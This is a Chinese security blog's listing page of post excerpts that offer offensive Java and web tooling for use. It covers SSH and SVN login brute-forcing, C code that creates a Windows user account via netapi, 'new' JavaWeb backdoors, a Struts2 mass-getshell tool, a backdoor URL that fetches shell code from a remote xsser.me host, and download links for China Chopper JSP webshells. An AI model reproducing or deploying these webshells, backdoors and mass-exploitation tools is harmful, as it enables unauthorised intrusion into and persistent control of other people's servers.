Security(80 篇文章)

Java login SSH

yzmm
596 阅读

Java连接并登陆SSH(需要用到的jar包-ganymed-ssh2-build210.jar): package org.javaweb.util; import java.io.IOException; import ch.ethz.ssh2.Connection; public class Ssh { public boolean login(String host,int port,St...

阅读全文

net user

yzmm
600 阅读

#include <windows.h> #include <lm.h> #pragma comment(lib,"netapi32") int main() { USER_INFO_1 u; DWORD dwError=0; u.usri1_name=L"tomcat"; u.usri1_password=L"admin8...

阅读全文

Java 实现登录SVN(可3690端口爆破)

yzmm
812 阅读

很多扫描SVN工具都是扫描的.svn文件,不能通过端口去扫描SVN。Java有SVN的扩展库,已实现了SVN客户端的所有功能。 SVN有个未授权访问问题,默认不开启。一般人都会设置必须登录才能访问资源,但不排除少部分偷懒的人。其次就是SVN弱口令了。 svnserve.conf: authz-db = authz 去年写了个简单的SVN客户端放着也没用。下面给的一个认证的demo程序,需要jar包...

阅读全文

[原创] 攻击JavaWeb应用[1-8]

yzmm
670 阅读

最新更新了后门篇,记录了下JavaWeb后门相关东东。 攻击JavaWeb应用[1-8].pdf 攻击JavaWeb应用[1-8].doc 内容: 攻击JavaWeb应用[1]-JavaEE 基础 攻击JavaWeb应用[2]-CS交互安全 攻击JavaWeb应用[3]-SQL注入[1] 攻击JavaWeb应用[4]-SQL注入[2] 攻击JavaWeb应用[5]-MVC安全 攻击JavaWeb应...

阅读全文

两种“新型”的javaweb后门(jspx和Java Logger)

yzmm
1029 阅读

关于JavaWeb后门问题一直以来都比较少,而比较新奇的后门更少。在这里我分享两个我最近搞的比较有意思的JavaWeb后门给大家玩。一个常见或者比较普通的后门很容易就会被拦截或者被发现,但不知道有朋友了解下面两种后门没? 1:jspx后门 在如今的web应用当中如果想直接传个jsp已经变得比较难了,但是如果只限制了asp、php、jsp、aspx等这些常见的后缀应该怎样去突破呢?我在读tomcat...

阅读全文

Struts2漏洞批量GetShell到MongoDb数据库

yzmm
930 阅读

这个很简单的,改下main的str的关键字就可以自动getshell并倒入mongodb数据库。 [只需要添加jsoup和mongodb的jar包] import java.io.IOException; import java.net.URL; import java.net.URLConnection; import java.net.UnknownHostException; import ...

阅读全文

JavaWeb随机后门?

yzmm
708 阅读

我的思路是先从远程读取要生成的shell内容,然后把shell藏在WEB-INF下shell的名字和长度也都随机生成。比如: 不过就算藏在WEB-INF下也会被发现,干脆用一次就删一次?这样不会在任何目录下留下Shell。 菜刀链接:http://localhost/Demo2/new.jsp?url=http://xsser.me/caidao/css.jsp <%@ page langu...

阅读全文

菜刀Jsp脚本最终更新版

yzmm
1014 阅读

脚本下载地址: JSP脚本:http://xsser.me/caidao/css.jsp Jspx脚本:http://xsser.me/caidao/jspx.jspx Jspf脚本:http://xsser.me/caidao/css.jspf 详情:http://xsser.me/caidao/1.txt 修复上一版BUG:  1、修复Oracle无setCatalog的BUG。&n...

阅读全文